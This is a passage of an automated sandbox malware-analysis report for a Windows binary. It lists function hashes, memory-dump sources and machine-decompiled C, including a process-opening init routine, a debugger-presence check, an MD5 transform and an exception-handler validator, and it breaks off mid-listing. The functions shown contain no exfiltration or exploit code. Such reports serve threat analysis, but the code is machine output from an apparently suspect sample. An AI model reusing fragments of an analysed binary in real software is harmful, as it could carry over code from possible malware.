Opcode ID: 3b812f4cbe050caf8362c3497b5127b5f749b7da610f862ddc0181809638e484
Instruction ID: 3aebcb16622a466015a39899e2dd4cfe56d915c5034050f77201d6fc4910aafe
Opcode Fuzzy Hash: 3b812f4cbe050caf8362c3497b5127b5f749b7da610f862ddc0181809638e484
Instruction Fuzzy Hash: 82F09032200525ABD731B7668C69EFB36ECDFD5710F4101E1FA4AC3045FAE4DA468661

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1800, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E0C1800() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e0c4130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e0c413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e0c412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e0c4128 = _t5;
						 *0x6e0c4130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e0c4124 = _t6;
						if(_t6 == 0) {
							 *0x6e0c4124 =  *0x6e0c4124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e0c1801
0x6e0c180f
0x6e0c1815
0x6e0c181c
0x6e0c1873
0x6e0c1873
0x6e0c181e
0x6e0c1826
0x6e0c1833
0x6e0c1833
0x6e0c186f
0x6e0c1871
0x00000000
0x00000000
0x00000000
0x6e0c1828
0x6e0c182f
0x6e0c1835
0x6e0c1835
0x6e0c183a
0x6e0c1848
0x6e0c184d
0x6e0c1853
0x6e0c1859
0x6e0c1860
0x6e0c1862
0x6e0c1862
0x6e0c186c
0x6e0c1831
0x6e0c1831
0x00000000
0x6e0c1831
0x6e0c182f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0C1D7A,74B063F0), ref: 6E0C180F
GetVersion.KERNEL32 ref: 6E0C181E
GetCurrentProcessId.KERNEL32 ref: 6E0C183A
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0C1853

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: f11e8e66604da46065dcfa963aa3c7da54eb7da95b143a2119ea86c7273e2f5f
Instruction ID: 7ec12d1887f3a2a2b84d9ad04a5b183c40a845c39ba7fdf75bf23d34efd87033
Opcode Fuzzy Hash: f11e8e66604da46065dcfa963aa3c7da54eb7da95b143a2119ea86c7273e2f5f
Instruction Fuzzy Hash: 01F08171568B01ABDF505FE9682D7483BF4B70BF52F100195FE95C61D4D7B080468B49

Uniqueness

Uniqueness Score: -1.00%

Function 6E10C6CB, Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6E10C700
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 6E10C7B5

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: DebuggerPresent_memset
String ID:
API String ID: 2328436684-0
Opcode ID: 0e1d012c1fdb80c9ab26fe14210386c0054b7843f348e166398ae7f45df335cd
Instruction ID: 54b1aacd82f1d66fd9d6538128f3537c0b39c24905321a143d4ba20b915dc0a9
Opcode Fuzzy Hash: 0e1d012c1fdb80c9ab26fe14210386c0054b7843f348e166398ae7f45df335cd
Instruction Fuzzy Hash: A231047581122C9BCB61DF64D8887CCBBB8BF08314F6042EAE81CA7250EB309BC59F45

Uniqueness

Uniqueness Score: -1.00%

Function 6E1110C1, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E10C7C9,?,?,?,00000001), ref: 6E1110C6
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6E1110CF

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c4252beb61ed8afb8b42ca864e6bd1400bf1d7e104f2c7147be88b06d395fc6e
Instruction ID: c8b3cf8ad102c6d1e167b364dd94f7459c6f59274db3a5ef9e33e2da913af7cf
Opcode Fuzzy Hash: c4252beb61ed8afb8b42ca864e6bd1400bf1d7e104f2c7147be88b06d395fc6e
Instruction Fuzzy Hash: D7B09231644609FFCE222B92DD0AF8C3F38EB06662F018010F62D48054AF626490AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8045, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00BB8045(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x00bb8048
0x00bb8053
0x00bb8056
0x00bb8059
0x00bb805a
0x00bb8078
0x00bb807a
0x00bb807d
0x00bb8080
0x00bb8080
0x00bb8083
0x00bb8083
0x00bb8086
0x00bb8086
0x00bb8089
0x00bb8089
0x00bb80a6
0x00bb80a9
0x00bb80bf
0x00bb80c2
0x00bb80dc
0x00bb80df
0x00bb80f5
0x00bb80f8
0x00bb80fa
0x00bb8112
0x00bb8115
0x00bb8118
0x00bb8130
0x00bb8133
0x00bb814d
0x00bb8150
0x00bb8166
0x00bb8169
0x00bb816b
0x00bb8183
0x00bb8188
0x00bb818b
0x00bb81a1
0x00bb81a4
0x00bb81be
0x00bb81c1
0x00bb81d7
0x00bb81da
0x00bb81dc
0x00bb81f7
0x00bb81fa
0x00bb8211
0x00bb8214
0x00bb8218
0x00bb8231
0x00bb8234
0x00bb8236
0x00bb8239
0x00bb8254
0x00bb8257
0x00bb8270
0x00bb8273
0x00bb8283
0x00bb8286
0x00bb829e
0x00bb82a1
0x00bb82bb
0x00bb82be
0x00bb82d6
0x00bb82d9
0x00bb82ef
0x00bb82f2
0x00bb830a
0x00bb830d
0x00bb8325
0x00bb8328
0x00bb8342
0x00bb8345
0x00bb835b
0x00bb835e
0x00bb8376
0x00bb8379
0x00bb8393
0x00bb8396
0x00bb83ae
0x00bb83b1
0x00bb83c7
0x00bb83ca
0x00bb83e2
0x00bb83e5
0x00bb83fd
0x00bb8400
0x00bb8412
0x00bb8415
0x00bb8427
0x00bb842a
0x00bb843c
0x00bb843f
0x00bb8443
0x00bb8453
0x00bb8456
0x00bb8464
0x00bb8467
0x00bb8479
0x00bb847c
0x00bb8490
0x00bb8493
0x00bb8495
0x00bb84a5
0x00bb84a8
0x00bb84ba
0x00bb84bd
0x00bb84cb
0x00bb84ce
0x00bb84e0
0x00bb84e3
0x00bb84e7
0x00bb84f7
0x00bb84fa
0x00bb850c
0x00bb850f
0x00bb851d
0x00bb8520
0x00bb8532
0x00bb8535
0x00bb8547
0x00bb854a
0x00bb855e
0x00bb8561
0x00bb8575
0x00bb8578
0x00bb858c
0x00bb858f
0x00bb85a3
0x00bb85a6
0x00bb85ba
0x00bb85bd
0x00bb85d1
0x00bb85d6
0x00bb85e8
0x00bb85eb
0x00bb85ff
0x00bb8602
0x00bb8616
0x00bb8619
0x00bb862f
0x00bb8632
0x00bb8646
0x00bb8649
0x00bb865b
0x00bb865e
0x00bb8672
0x00bb8675
0x00bb8689
0x00bb868c
0x00bb86a0
0x00bb86a9
0x00bb86ac
0x00bb86b5
0x00bb86be
0x00bb86c6
0x00bb86ce
0x00bb86d8
0x00bb86ed

APIs

memset.NTDLL ref: 00BB86E1

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 2c114970060823254187c0ea4b4ef3afbdff05c350dc032471e6efce3afd0d2d
Instruction ID: 7320079825a33bdf1920c0012ea169c571f349df60bcd17ff203cca0c4f314f7
Opcode Fuzzy Hash: 2c114970060823254187c0ea4b4ef3afbdff05c350dc032471e6efce3afd0d2d
Instruction Fuzzy Hash: 1122857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C23A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E0C23A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e0c4178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e0c41c0 = 1;
										__eflags =  *0x6e0c41c0;
										if( *0x6e0c41c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6e0c4178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e0c41c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e0c4178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e0c4180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e0c417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e0c41c0 = 1;
							__eflags =  *0x6e0c41c0;
							if( *0x6e0c41c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e0c41c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e0c4180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e0c4178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e0c23af
0x6e0c23b2
0x6e0c23b8
0x6e0c23d6
0x00000000
0x6e0c23d6
0x6e0c23c0
0x6e0c23c9
0x6e0c23cf
0x6e0c23de
0x6e0c23e1
0x6e0c23e4
0x6e0c23ee
0x6e0c23ee
0x6e0c23f0
0x6e0c23f3
0x6e0c23f5
0x6e0c23f5
0x6e0c23f7
0x6e0c23fa
0x00000000
0x00000000
0x6e0c23fc
0x6e0c23fe
0x6e0c2464
0x6e0c2464
0x6e0c25c2
0x00000000
0x6e0c25c2
0x6e0c2400
0x6e0c2400
0x6e0c2404
0x6e0c2406
0x6e0c2406
0x6e0c2406
0x6e0c2406
0x6e0c2409
0x6e0c240a
0x6e0c240d
0x6e0c240d
0x6e0c2411
0x6e0c2415
0x6e0c2423
0x6e0c2423
0x6e0c242b
0x6e0c2431
0x6e0c2433
0x6e0c2435
0x6e0c2445
0x6e0c2452
0x6e0c2456
0x6e0c245b
0x6e0c245d
0x6e0c24db
0x6e0c24db
0x6e0c245f
0x6e0c245f
0x6e0c245f
0x6e0c24dd
0x6e0c24df
0x6e0c25c0
0x6e0c25c0
0x00000000
0x6e0c24e5
0x6e0c24e5
0x6e0c24ec
0x00000000
0x00000000
0x6e0c24f2
0x6e0c24f6
0x6e0c2552
0x6e0c2554
0x6e0c255c
0x6e0c255e
0x6e0c2560
0x00000000
0x00000000
0x6e0c2562
0x6e0c2568
0x6e0c256a
0x6e0c256c
0x6e0c2581
0x6e0c2581
0x6e0c2583
0x6e0c25b2
0x6e0c25b9
0x00000000
0x6e0c25b9
0x6e0c2587
0x6e0c2588
0x6e0c258a
0x6e0c258c
0x6e0c258c
0x6e0c258e
0x6e0c2590
0x6e0c2592
0x6e0c25a6
0x6e0c25a6
0x6e0c25a9
